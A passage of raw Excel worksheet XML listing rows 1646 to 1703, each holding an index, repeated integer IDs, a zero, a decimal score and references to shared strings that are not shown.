      <c r="G1646" t="s">
        <v>3248</v>
      </c>
      <c r="H1646" t="s">
        <v>3249</v>
      </c>
    </row>
    <row r="1647" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1647" s="1">
        <v>1645</v>
      </c>
      <c r="B1647">
        <v>5605</v>
      </c>
      <c r="C1647">
        <v>5605</v>
      </c>
      <c r="D1647">
        <v>0</v>
      </c>
      <c r="E1647">
        <v>0.99980002641677856</v>
      </c>
      <c r="F1647" t="s">
        <v>7</v>
      </c>
      <c r="G1647" t="s">
        <v>3250</v>
      </c>
      <c r="H1647" t="s">
        <v>3251</v>
      </c>
    </row>
    <row r="1648" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1648" s="1">
        <v>1646</v>
      </c>
      <c r="B1648">
        <v>839</v>
      </c>
      <c r="C1648">
        <v>839</v>
      </c>
      <c r="D1648">
        <v>0</v>
      </c>
      <c r="E1648">
        <v>0.77670001983642578</v>
      </c>
      <c r="F1648" t="s">
        <v>7</v>
      </c>
      <c r="G1648" t="s">
        <v>3252</v>
      </c>
      <c r="H1648" t="s">
        <v>3253</v>
      </c>
    </row>
    <row r="1649" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1649" s="1">
        <v>1647</v>
      </c>
      <c r="B1649">
        <v>156</v>
      </c>
      <c r="C1649">
        <v>156</v>
      </c>
      <c r="D1649">
        <v>0</v>
      </c>
      <c r="E1649">
        <v>0.96069997549057007</v>
      </c>
      <c r="F1649" t="s">
        <v>7</v>
      </c>
      <c r="G1649" t="s">
        <v>3254</v>
      </c>
      <c r="H1649" t="s">
        <v>3255</v>
      </c>
    </row>
    <row r="1650" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1650" s="1">
        <v>1648</v>
      </c>
      <c r="B1650">
        <v>5131</v>
      </c>
      <c r="C1650">
        <v>5131</v>
      </c>
      <c r="D1650">
        <v>0</v>
      </c>
      <c r="E1650">
        <v>0.75019997358322144</v>
      </c>
      <c r="F1650" t="s">
        <v>7</v>
      </c>
      <c r="G1650" t="s">
        <v>3256</v>
      </c>
      <c r="H1650" t="s">
        <v>3257</v>
      </c>
    </row>
    <row r="1651" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1651" s="1">
        <v>1649</v>
      </c>
      <c r="B1651">
        <v>847</v>
      </c>
      <c r="C1651">
        <v>847</v>
      </c>
      <c r="D1651">
        <v>0</v>
      </c>
      <c r="E1651">
        <v>0.61699998378753662</v>
      </c>
      <c r="F1651" t="s">
        <v>7</v>
      </c>
      <c r="G1651" t="s">
        <v>3258</v>
      </c>
      <c r="H1651" t="s">
        <v>3259</v>
      </c>
    </row>
    <row r="1652" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1652" s="1">
        <v>1650</v>
      </c>
      <c r="B1652">
        <v>5174</v>
      </c>
      <c r="C1652">
        <v>5174</v>
      </c>
      <c r="D1652">
        <v>0</v>
      </c>
      <c r="E1652">
        <v>0.82239997386932373</v>
      </c>
      <c r="F1652" t="s">
        <v>7</v>
      </c>
      <c r="G1652" t="s">
        <v>3260</v>
      </c>
      <c r="H1652" t="s">
        <v>3261</v>
      </c>
    </row>
    <row r="1653" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1653" s="1">
        <v>1651</v>
      </c>
      <c r="B1653">
        <v>5251</v>
      </c>
      <c r="C1653">
        <v>5251</v>
      </c>
      <c r="D1653">
        <v>0</v>
      </c>
      <c r="E1653">
        <v>0.53589999675750732</v>
      </c>
      <c r="F1653" t="s">
        <v>7</v>
      </c>
      <c r="G1653" t="s">
        <v>3262</v>
      </c>
      <c r="H1653" t="s">
        <v>3263</v>
      </c>
    </row>
    <row r="1654" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1654" s="1">
        <v>1652</v>
      </c>
      <c r="B1654">
        <v>817</v>
      </c>
      <c r="C1654">
        <v>817</v>
      </c>
      <c r="D1654">
        <v>0</v>
      </c>
      <c r="E1654">
        <v>0.58639997243881226</v>
      </c>
      <c r="F1654" t="s">
        <v>7</v>
      </c>
      <c r="G1654" t="s">
        <v>3264</v>
      </c>
      <c r="H1654" t="s">
        <v>3265</v>
      </c>
    </row>
    <row r="1655" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1655" s="1">
        <v>1653</v>
      </c>
      <c r="B1655">
        <v>7817</v>
      </c>
      <c r="C1655">
        <v>7817</v>
      </c>
      <c r="D1655">
        <v>0</v>
      </c>
      <c r="E1655">
        <v>0.58289998769760132</v>
      </c>
      <c r="F1655" t="s">
        <v>7</v>
      </c>
      <c r="G1655" t="s">
        <v>3266</v>
      </c>
      <c r="H1655" t="s">
        <v>3267</v>
      </c>
    </row>
    <row r="1656" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1656" s="1">
        <v>1654</v>
      </c>
      <c r="B1656">
        <v>795</v>
      </c>
      <c r="C1656">
        <v>795</v>
      </c>
      <c r="D1656">
        <v>0</v>
      </c>
      <c r="E1656">
        <v>0.98110002279281616</v>
      </c>
      <c r="F1656" t="s">
        <v>7</v>
      </c>
      <c r="G1656" t="s">
        <v>3268</v>
      </c>
      <c r="H1656" t="s">
        <v>3269</v>
      </c>
    </row>
    <row r="1657" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1657" s="1">
        <v>1655</v>
      </c>
      <c r="B1657">
        <v>5159</v>
      </c>
      <c r="C1657">
        <v>5159</v>
      </c>
      <c r="D1657">
        <v>0</v>
      </c>
      <c r="E1657">
        <v>0.97780001163482666</v>
      </c>
      <c r="F1657" t="s">
        <v>7</v>
      </c>
      <c r="G1657" t="s">
        <v>3270</v>
      </c>
      <c r="H1657" t="s">
        <v>3271</v>
      </c>
    </row>
    <row r="1658" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1658" s="1">
        <v>1656</v>
      </c>
      <c r="B1658">
        <v>257</v>
      </c>
      <c r="C1658">
        <v>257</v>
      </c>
      <c r="D1658">
        <v>0</v>
      </c>
      <c r="E1658">
        <v>0.45140001177787781</v>
      </c>
      <c r="F1658" t="s">
        <v>7</v>
      </c>
      <c r="G1658" t="s">
        <v>3272</v>
      </c>
      <c r="H1658" t="s">
        <v>3273</v>
      </c>
    </row>
    <row r="1659" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1659" s="1">
        <v>1657</v>
      </c>
      <c r="B1659">
        <v>5614</v>
      </c>
      <c r="C1659">
        <v>5614</v>
      </c>
      <c r="D1659">
        <v>0</v>
      </c>
      <c r="E1659">
        <v>0.52300000190734863</v>
      </c>
      <c r="F1659" t="s">
        <v>7</v>
      </c>
      <c r="G1659" t="s">
        <v>3274</v>
      </c>
      <c r="H1659" t="s">
        <v>3275</v>
      </c>
    </row>
    <row r="1660" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1660" s="1">
        <v>1658</v>
      </c>
      <c r="B1660">
        <v>7654</v>
      </c>
      <c r="C1660">
        <v>7654</v>
      </c>
      <c r="D1660">
        <v>0</v>
      </c>
      <c r="E1660">
        <v>0.62620002031326294</v>
      </c>
      <c r="F1660" t="s">
        <v>7</v>
      </c>
      <c r="G1660" t="s">
        <v>3276</v>
      </c>
      <c r="H1660" t="s">
        <v>3277</v>
      </c>
    </row>
    <row r="1661" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1661" s="1">
        <v>1659</v>
      </c>
      <c r="B1661">
        <v>793</v>
      </c>
      <c r="C1661">
        <v>793</v>
      </c>
      <c r="D1661">
        <v>0</v>
      </c>
      <c r="E1661">
        <v>0.63230001926422119</v>
      </c>
      <c r="F1661" t="s">
        <v>7</v>
      </c>
      <c r="G1661" t="s">
        <v>3278</v>
      </c>
      <c r="H1661" t="s">
        <v>3279</v>
      </c>
    </row>
    <row r="1662" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1662" s="1">
        <v>1660</v>
      </c>
      <c r="B1662">
        <v>5246</v>
      </c>
      <c r="C1662">
        <v>5246</v>
      </c>
      <c r="D1662">
        <v>0</v>
      </c>
      <c r="E1662">
        <v>0.86809998750686646</v>
      </c>
      <c r="F1662" t="s">
        <v>7</v>
      </c>
      <c r="G1662" t="s">
        <v>3280</v>
      </c>
      <c r="H1662" t="s">
        <v>3281</v>
      </c>
    </row>
    <row r="1663" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1663" s="1">
        <v>1661</v>
      </c>
      <c r="B1663">
        <v>255</v>
      </c>
      <c r="C1663">
        <v>255</v>
      </c>
      <c r="D1663">
        <v>0</v>
      </c>
      <c r="E1663">
        <v>0.70080000162124634</v>
      </c>
      <c r="F1663" t="s">
        <v>7</v>
      </c>
      <c r="G1663" t="s">
        <v>3282</v>
      </c>
      <c r="H1663" t="s">
        <v>3283</v>
      </c>
    </row>
    <row r="1664" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1664" s="1">
        <v>1662</v>
      </c>
      <c r="B1664">
        <v>188</v>
      </c>
      <c r="C1664">
        <v>188</v>
      </c>
      <c r="D1664">
        <v>0</v>
      </c>
      <c r="E1664">
        <v>0.72430002689361572</v>
      </c>
      <c r="F1664" t="s">
        <v>7</v>
      </c>
      <c r="G1664" t="s">
        <v>3284</v>
      </c>
      <c r="H1664" t="s">
        <v>3285</v>
      </c>
    </row>
    <row r="1665" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1665" s="1">
        <v>1663</v>
      </c>
      <c r="B1665">
        <v>253</v>
      </c>
      <c r="C1665">
        <v>253</v>
      </c>
      <c r="D1665">
        <v>0</v>
      </c>
      <c r="E1665">
        <v>0.66949999332427979</v>
      </c>
      <c r="F1665" t="s">
        <v>7</v>
      </c>
      <c r="G1665" t="s">
        <v>3286</v>
      </c>
      <c r="H1665" t="s">
        <v>3287</v>
      </c>
    </row>
    <row r="1666" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1666" s="1">
        <v>1664</v>
      </c>
      <c r="B1666">
        <v>190</v>
      </c>
      <c r="C1666">
        <v>190</v>
      </c>
      <c r="D1666">
        <v>0</v>
      </c>
      <c r="E1666">
        <v>0.55559998750686646</v>
      </c>
      <c r="F1666" t="s">
        <v>7</v>
      </c>
      <c r="G1666" t="s">
        <v>3288</v>
      </c>
      <c r="H1666" t="s">
        <v>2259</v>
      </c>
    </row>
    <row r="1667" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1667" s="1">
        <v>1665</v>
      </c>
      <c r="B1667">
        <v>5163</v>
      </c>
      <c r="C1667">
        <v>5163</v>
      </c>
      <c r="D1667">
        <v>0</v>
      </c>
      <c r="E1667">
        <v>0.91860002279281616</v>
      </c>
      <c r="F1667" t="s">
        <v>7</v>
      </c>
      <c r="G1667" t="s">
        <v>3289</v>
      </c>
      <c r="H1667" t="s">
        <v>3290</v>
      </c>
    </row>
    <row r="1668" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1668" s="1">
        <v>1666</v>
      </c>
      <c r="B1668">
        <v>7650</v>
      </c>
      <c r="C1668">
        <v>7650</v>
      </c>
      <c r="D1668">
        <v>0</v>
      </c>
      <c r="E1668">
        <v>0.70539999008178711</v>
      </c>
      <c r="F1668" t="s">
        <v>7</v>
      </c>
      <c r="G1668" t="s">
        <v>3291</v>
      </c>
      <c r="H1668" t="s">
        <v>3292</v>
      </c>
    </row>
    <row r="1669" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1669" s="1">
        <v>1667</v>
      </c>
      <c r="B1669">
        <v>7649</v>
      </c>
      <c r="C1669">
        <v>7649</v>
      </c>
      <c r="D1669">
        <v>0</v>
      </c>
      <c r="E1669">
        <v>0.99910002946853638</v>
      </c>
      <c r="F1669" t="s">
        <v>7</v>
      </c>
      <c r="G1669" t="s">
        <v>3293</v>
      </c>
      <c r="H1669" t="s">
        <v>3294</v>
      </c>
    </row>
    <row r="1670" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1670" s="1">
        <v>1668</v>
      </c>
      <c r="B1670">
        <v>5165</v>
      </c>
      <c r="C1670">
        <v>5165</v>
      </c>
      <c r="D1670">
        <v>0</v>
      </c>
      <c r="E1670">
        <v>0.55299997329711914</v>
      </c>
      <c r="F1670" t="s">
        <v>7</v>
      </c>
      <c r="G1670" t="s">
        <v>3295</v>
      </c>
      <c r="H1670" t="s">
        <v>3296</v>
      </c>
    </row>
    <row r="1671" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1671" s="1">
        <v>1669</v>
      </c>
      <c r="B1671">
        <v>193</v>
      </c>
      <c r="C1671">
        <v>193</v>
      </c>
      <c r="D1671">
        <v>0</v>
      </c>
      <c r="E1671">
        <v>0.51380002498626709</v>
      </c>
      <c r="F1671" t="s">
        <v>7</v>
      </c>
      <c r="G1671" t="s">
        <v>3297</v>
      </c>
      <c r="H1671" t="s">
        <v>3298</v>
      </c>
    </row>
    <row r="1672" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1672" s="1">
        <v>1670</v>
      </c>
      <c r="B1672">
        <v>628</v>
      </c>
      <c r="C1672">
        <v>628</v>
      </c>
      <c r="D1672">
        <v>0</v>
      </c>
      <c r="E1672">
        <v>0.57309997081756592</v>
      </c>
      <c r="F1672" t="s">
        <v>7</v>
      </c>
      <c r="G1672" t="s">
        <v>3299</v>
      </c>
      <c r="H1672" t="s">
        <v>3300</v>
      </c>
    </row>
    <row r="1673" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1673" s="1">
        <v>1671</v>
      </c>
      <c r="B1673">
        <v>7647</v>
      </c>
      <c r="C1673">
        <v>7647</v>
      </c>
      <c r="D1673">
        <v>0</v>
      </c>
      <c r="E1673">
        <v>0.54739999771118164</v>
      </c>
      <c r="F1673" t="s">
        <v>7</v>
      </c>
      <c r="G1673" t="s">
        <v>3301</v>
      </c>
      <c r="H1673" t="s">
        <v>3302</v>
      </c>
    </row>
    <row r="1674" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1674" s="1">
        <v>1672</v>
      </c>
      <c r="B1674">
        <v>5168</v>
      </c>
      <c r="C1674">
        <v>5168</v>
      </c>
      <c r="D1674">
        <v>0</v>
      </c>
      <c r="E1674">
        <v>0.43009999394416809</v>
      </c>
      <c r="F1674" t="s">
        <v>7</v>
      </c>
      <c r="G1674" t="s">
        <v>3303</v>
      </c>
      <c r="H1674" t="s">
        <v>3304</v>
      </c>
    </row>
    <row r="1675" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1675" s="1">
        <v>1673</v>
      </c>
      <c r="B1675">
        <v>630</v>
      </c>
      <c r="C1675">
        <v>630</v>
      </c>
      <c r="D1675">
        <v>0</v>
      </c>
      <c r="E1675">
        <v>0.93760001659393311</v>
      </c>
      <c r="F1675" t="s">
        <v>7</v>
      </c>
      <c r="G1675" t="s">
        <v>3305</v>
      </c>
      <c r="H1675" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="1676" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1676" s="1">
        <v>1674</v>
      </c>
      <c r="B1676">
        <v>184</v>
      </c>
      <c r="C1676">
        <v>184</v>
      </c>
      <c r="D1676">
        <v>0</v>
      </c>
      <c r="E1676">
        <v>0.98629999160766602</v>
      </c>
      <c r="F1676" t="s">
        <v>7</v>
      </c>
      <c r="G1676" t="s">
        <v>3307</v>
      </c>
      <c r="H1676" t="s">
        <v>3308</v>
      </c>
    </row>
    <row r="1677" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1677" s="1">
        <v>1675</v>
      </c>
      <c r="B1677">
        <v>7551</v>
      </c>
      <c r="C1677">
        <v>7551</v>
      </c>
      <c r="D1677">
        <v>0</v>
      </c>
      <c r="E1677">
        <v>0.99699997901916504</v>
      </c>
      <c r="F1677" t="s">
        <v>7</v>
      </c>
      <c r="G1677" t="s">
        <v>3309</v>
      </c>
      <c r="H1677" t="s">
        <v>3310</v>
      </c>
    </row>
    <row r="1678" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1678" s="1">
        <v>1676</v>
      </c>
      <c r="B1678">
        <v>7550</v>
      </c>
      <c r="C1678">
        <v>7550</v>
      </c>
      <c r="D1678">
        <v>0</v>
      </c>
      <c r="E1678">
        <v>0.96429997682571411</v>
      </c>
      <c r="F1678" t="s">
        <v>7</v>
      </c>
      <c r="G1678" t="s">
        <v>3311</v>
      </c>
      <c r="H1678" t="s">
        <v>3312</v>
      </c>
    </row>
    <row r="1679" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1679" s="1">
        <v>1677</v>
      </c>
      <c r="B1679">
        <v>5753</v>
      </c>
      <c r="C1679">
        <v>5753</v>
      </c>
      <c r="D1679">
        <v>0</v>
      </c>
      <c r="E1679">
        <v>0.65509998798370361</v>
      </c>
      <c r="F1679" t="s">
        <v>7</v>
      </c>
      <c r="G1679" t="s">
        <v>3313</v>
      </c>
      <c r="H1679" t="s">
        <v>3314</v>
      </c>
    </row>
    <row r="1680" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1680" s="1">
        <v>1678</v>
      </c>
      <c r="B1680">
        <v>7542</v>
      </c>
      <c r="C1680">
        <v>7542</v>
      </c>
      <c r="D1680">
        <v>0</v>
      </c>
      <c r="E1680">
        <v>0.74059998989105225</v>
      </c>
      <c r="F1680" t="s">
        <v>7</v>
      </c>
      <c r="G1680" t="s">
        <v>3315</v>
      </c>
      <c r="H1680" t="s">
        <v>3316</v>
      </c>
    </row>
    <row r="1681" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1681" s="1">
        <v>1679</v>
      </c>
      <c r="B1681">
        <v>815</v>
      </c>
      <c r="C1681">
        <v>815</v>
      </c>
      <c r="D1681">
        <v>0</v>
      </c>
      <c r="E1681">
        <v>0.59630000591278076</v>
      </c>
      <c r="F1681" t="s">
        <v>7</v>
      </c>
      <c r="G1681" t="s">
        <v>3317</v>
      </c>
      <c r="H1681" t="s">
        <v>3318</v>
      </c>
    </row>
    <row r="1682" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1682" s="1">
        <v>1680</v>
      </c>
      <c r="B1682">
        <v>814</v>
      </c>
      <c r="C1682">
        <v>814</v>
      </c>
      <c r="D1682">
        <v>0</v>
      </c>
      <c r="E1682">
        <v>0.89170002937316895</v>
      </c>
      <c r="F1682" t="s">
        <v>7</v>
      </c>
      <c r="G1682" t="s">
        <v>3319</v>
      </c>
      <c r="H1682" t="s">
        <v>3320</v>
      </c>
    </row>
    <row r="1683" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1683" s="1">
        <v>1681</v>
      </c>
      <c r="B1683">
        <v>7656</v>
      </c>
      <c r="C1683">
        <v>7656</v>
      </c>
      <c r="D1683">
        <v>0</v>
      </c>
      <c r="E1683">
        <v>0.94660001993179321</v>
      </c>
      <c r="F1683" t="s">
        <v>7</v>
      </c>
      <c r="G1683" t="s">
        <v>3321</v>
      </c>
      <c r="H1683" t="s">
        <v>3322</v>
      </c>
    </row>
    <row r="1684" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1684" s="1">
        <v>1682</v>
      </c>
      <c r="B1684">
        <v>7655</v>
      </c>
      <c r="C1684">
        <v>7655</v>
      </c>
      <c r="D1684">
        <v>0</v>
      </c>
      <c r="E1684">
        <v>0.99419999122619629</v>
      </c>
      <c r="F1684" t="s">
        <v>7</v>
      </c>
      <c r="G1684" t="s">
        <v>3323</v>
      </c>
      <c r="H1684" t="s">
        <v>3324</v>
      </c>
    </row>
    <row r="1685" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1685" s="1">
        <v>1683</v>
      </c>
      <c r="B1685">
        <v>615</v>
      </c>
      <c r="C1685">
        <v>615</v>
      </c>
      <c r="D1685">
        <v>0</v>
      </c>
      <c r="E1685">
        <v>0.99580001831054688</v>
      </c>
      <c r="F1685" t="s">
        <v>7</v>
      </c>
      <c r="G1685" t="s">
        <v>3325</v>
      </c>
      <c r="H1685" t="s">
        <v>3326</v>
      </c>
    </row>
    <row r="1686" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1686" s="1">
        <v>1684</v>
      </c>
      <c r="B1686">
        <v>7848</v>
      </c>
      <c r="C1686">
        <v>7848</v>
      </c>
      <c r="D1686">
        <v>0</v>
      </c>
      <c r="E1686">
        <v>0.76819998025894165</v>
      </c>
      <c r="F1686" t="s">
        <v>7</v>
      </c>
      <c r="G1686" t="s">
        <v>3327</v>
      </c>
      <c r="H1686" t="s">
        <v>3328</v>
      </c>
    </row>
    <row r="1687" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1687" s="1">
        <v>1685</v>
      </c>
      <c r="B1687">
        <v>179</v>
      </c>
      <c r="C1687">
        <v>179</v>
      </c>
      <c r="D1687">
        <v>0</v>
      </c>
      <c r="E1687">
        <v>0.99739998579025269</v>
      </c>
      <c r="F1687" t="s">
        <v>7</v>
      </c>
      <c r="G1687" t="s">
        <v>3329</v>
      </c>
      <c r="H1687" t="s">
        <v>3330</v>
      </c>
    </row>
    <row r="1688" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1688" s="1">
        <v>1686</v>
      </c>
      <c r="B1688">
        <v>5612</v>
      </c>
      <c r="C1688">
        <v>5612</v>
      </c>
      <c r="D1688">
        <v>0</v>
      </c>
      <c r="E1688">
        <v>0.97310000658035278</v>
      </c>
      <c r="F1688" t="s">
        <v>7</v>
      </c>
      <c r="G1688" t="s">
        <v>3331</v>
      </c>
      <c r="H1688" t="s">
        <v>3332</v>
      </c>
    </row>
    <row r="1689" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1689" s="1">
        <v>1687</v>
      </c>
      <c r="B1689">
        <v>5756</v>
      </c>
      <c r="C1689">
        <v>5756</v>
      </c>
      <c r="D1689">
        <v>0</v>
      </c>
      <c r="E1689">
        <v>0.79250001907348633</v>
      </c>
      <c r="F1689" t="s">
        <v>7</v>
      </c>
      <c r="G1689" t="s">
        <v>3333</v>
      </c>
      <c r="H1689" t="s">
        <v>3334</v>
      </c>
    </row>
    <row r="1690" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1690" s="1">
        <v>1688</v>
      </c>
      <c r="B1690">
        <v>5611</v>
      </c>
      <c r="C1690">
        <v>5611</v>
      </c>
      <c r="D1690">
        <v>0</v>
      </c>
      <c r="E1690">
        <v>0.55369997024536133</v>
      </c>
      <c r="F1690" t="s">
        <v>7</v>
      </c>
      <c r="G1690" t="s">
        <v>3335</v>
      </c>
      <c r="H1690" t="s">
        <v>3336</v>
      </c>
    </row>
    <row r="1691" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1691" s="1">
        <v>1689</v>
      </c>
      <c r="B1691">
        <v>5150</v>
      </c>
      <c r="C1691">
        <v>5150</v>
      </c>
      <c r="D1691">
        <v>0</v>
      </c>
      <c r="E1691">
        <v>0.70080000162124634</v>
      </c>
      <c r="F1691" t="s">
        <v>7</v>
      </c>
      <c r="G1691" t="s">
        <v>3337</v>
      </c>
      <c r="H1691" t="s">
        <v>3338</v>
      </c>
    </row>
    <row r="1692" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1692" s="1">
        <v>1690</v>
      </c>
      <c r="B1692">
        <v>5613</v>
      </c>
      <c r="C1692">
        <v>5613</v>
      </c>
      <c r="D1692">
        <v>0</v>
      </c>
      <c r="E1692">
        <v>0.44020000100135798</v>
      </c>
      <c r="F1692" t="s">
        <v>7</v>
      </c>
      <c r="G1692" t="s">
        <v>3339</v>
      </c>
      <c r="H1692" t="s">
        <v>3340</v>
      </c>
    </row>
    <row r="1693" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1693" s="1">
        <v>1691</v>
      </c>
      <c r="B1693">
        <v>5151</v>
      </c>
      <c r="C1693">
        <v>5151</v>
      </c>
      <c r="D1693">
        <v>0</v>
      </c>
      <c r="E1693">
        <v>0.99379998445510864</v>
      </c>
      <c r="F1693" t="s">
        <v>7</v>
      </c>
      <c r="G1693" t="s">
        <v>3341</v>
      </c>
      <c r="H1693" t="s">
        <v>3342</v>
      </c>
    </row>
    <row r="1694" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1694" s="1">
        <v>1692</v>
      </c>
      <c r="B1694">
        <v>5152</v>
      </c>
      <c r="C1694">
        <v>5152</v>
      </c>
      <c r="D1694">
        <v>0</v>
      </c>
      <c r="E1694">
        <v>0.9976000189781189</v>
      </c>
      <c r="F1694" t="s">
        <v>7</v>
      </c>
      <c r="G1694" t="s">
        <v>3343</v>
      </c>
      <c r="H1694" t="s">
        <v>3344</v>
      </c>
    </row>
    <row r="1695" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1695" s="1">
        <v>1693</v>
      </c>
      <c r="B1695">
        <v>7548</v>
      </c>
      <c r="C1695">
        <v>7548</v>
      </c>
      <c r="D1695">
        <v>0</v>
      </c>
      <c r="E1695">
        <v>0.92580002546310425</v>
      </c>
      <c r="F1695" t="s">
        <v>7</v>
      </c>
      <c r="G1695" t="s">
        <v>3345</v>
      </c>
      <c r="H1695" t="s">
        <v>3346</v>
      </c>
    </row>
    <row r="1696" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1696" s="1">
        <v>1694</v>
      </c>
      <c r="B1696">
        <v>5153</v>
      </c>
      <c r="C1696">
        <v>5153</v>
      </c>
      <c r="D1696">
        <v>0</v>
      </c>
      <c r="E1696">
        <v>0.64829999208450317</v>
      </c>
      <c r="F1696" t="s">
        <v>7</v>
      </c>
      <c r="G1696" t="s">
        <v>3347</v>
      </c>
      <c r="H1696" t="s">
        <v>3348</v>
      </c>
    </row>
    <row r="1697" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1697" s="1">
        <v>1695</v>
      </c>
      <c r="B1697">
        <v>5434</v>
      </c>
      <c r="C1697">
        <v>5434</v>
      </c>
      <c r="D1697">
        <v>0</v>
      </c>
      <c r="E1697">
        <v>0.99430000782012939</v>
      </c>
      <c r="F1697" t="s">
        <v>7</v>
      </c>
      <c r="G1697" t="s">
        <v>3349</v>
      </c>
      <c r="H1697" t="s">
        <v>3350</v>
      </c>
    </row>
    <row r="1698" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1698" s="1">
        <v>1696</v>
      </c>
      <c r="B1698">
        <v>5155</v>
      </c>
      <c r="C1698">
        <v>5155</v>
      </c>
      <c r="D1698">
        <v>0</v>
      </c>
      <c r="E1698">
        <v>0.98489999771118164</v>
      </c>
      <c r="F1698" t="s">
        <v>7</v>
      </c>
      <c r="G1698" t="s">
        <v>3351</v>
      </c>
      <c r="H1698" t="s">
        <v>3352</v>
      </c>
    </row>
    <row r="1699" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1699" s="1">
        <v>1697</v>
      </c>
      <c r="B1699">
        <v>5156</v>
      </c>
      <c r="C1699">
        <v>5156</v>
      </c>
      <c r="D1699">
        <v>0</v>
      </c>
      <c r="E1699">
        <v>0.58639997243881226</v>
      </c>
      <c r="F1699" t="s">
        <v>7</v>
      </c>
      <c r="G1699" t="s">
        <v>3353</v>
      </c>
      <c r="H1699" t="s">
        <v>3354</v>
      </c>
    </row>
    <row r="1700" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1700" s="1">
        <v>1698</v>
      </c>
      <c r="B1700">
        <v>616</v>
      </c>
      <c r="C1700">
        <v>616</v>
      </c>
      <c r="D1700">
        <v>0</v>
      </c>
      <c r="E1700">
        <v>0.63429999351501465</v>
      </c>
      <c r="F1700" t="s">
        <v>7</v>
      </c>
      <c r="G1700" t="s">
        <v>3355</v>
      </c>
      <c r="H1700" t="s">
        <v>3356</v>
      </c>
    </row>
    <row r="1701" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1701" s="1">
        <v>1699</v>
      </c>
      <c r="B1701">
        <v>801</v>
      </c>
      <c r="C1701">
        <v>801</v>
      </c>
      <c r="D1701">
        <v>0</v>
      </c>
      <c r="E1701">
        <v>0.59890002012252808</v>
      </c>
      <c r="F1701" t="s">
        <v>7</v>
      </c>
      <c r="G1701" t="s">
        <v>3357</v>
      </c>
      <c r="H1701" t="s">
        <v>3358</v>
      </c>
    </row>
    <row r="1702" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1702" s="1">
        <v>1700</v>
      </c>
      <c r="B1702">
        <v>7846</v>
      </c>
      <c r="C1702">
        <v>7846</v>
      </c>
      <c r="D1702">
        <v>0</v>
      </c>
      <c r="E1702">
        <v>0.85049998760223389</v>
      </c>
      <c r="F1702" t="s">
        <v>7</v>
      </c>
      <c r="G1702" t="s">
        <v>3359</v>
      </c>
      <c r="H1702" t="s">
        <v>3360</v>
      </c>
    </row>
    <row r="1703" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1703" s="1">
        <v>1701</v>
      </c>
      <c r="B1703">
        <v>501</v>
      </c>
      <c r="C1703">
        <v>501</v>
      </c>
      <c r="D1703">
        <v>0</v>
      </c>
      <c r="E1703">
        <v>0.63969999551773071</v>
      </c>
      <c r="F1703" t="s">
        <v>7</v>
      </c>
      <c r="G1703" t="s">
        <v>3361</v>
      </c>
      <c r="H1703" t="s">
        <v>3362</v>
      </c>
    </row>
    <row r="1704" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1704" s="1">
        <v>1702</v>
      </c>
      <c r="B1704">
        <v>979</v>
      </c>
      <c r="C1704">
        <v>979</v>
      </c>
      <c r="D1704">
        <v>0</v>
      </c>
      <c r="E1704">
        <v>0.98869997262954712</v>
      </c>
      <c r="F1704" t="s">
        <v>7</v>
      </c>
      <c r="G1704" t="s">
        <v>3363</v>
      </c>
      <c r="H1704" t="s">
        <v>3364</v>
      </c>
    </row>
    <row r="1705" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1705" s="1">
        <v>1703</v>
      </c>
      <c r="B1705">
        <v>499</v>
      </c>
      <c r="C1705">
        <v>499</v>
      </c>
      <c r="D1705">
        <v>0</v>
      </c>
